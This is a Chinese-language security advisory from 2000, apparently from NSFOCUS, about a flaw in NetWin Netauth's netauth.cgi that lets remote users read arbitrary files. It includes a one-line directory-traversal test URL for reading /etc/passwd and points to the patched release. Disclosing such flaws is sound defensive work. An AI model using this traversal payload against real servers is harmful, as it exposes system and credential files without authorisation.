首页 -> 安全研究

安全研究

安全漏洞
Netwin Netauth 泄漏系统文件内容漏洞

发布日期:2000-08-21
更新日期:2000-08-21

受影响系统:

NetWin Netauth 4.2以及更低版本
描述:

Netwin 的Netauth软件是一个基于web的邮件管理系统。它应用在Windows NT和大部分的Unix
品台上。它提供的一个cgi程序:netauth.cgi存在一个安全问题,允许远程用户读取web主机上
任何已知文件。

<* 来源:Marc Maiffret  (marc@eeye.com) *>






测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


http://[server]/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd


建议:

Netwin已经发布了Netauth 4.2f,这个版本解决了这个问题,下载地址:

http://netwinsite.com/netauth/download.htm




浏览次数:5919
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障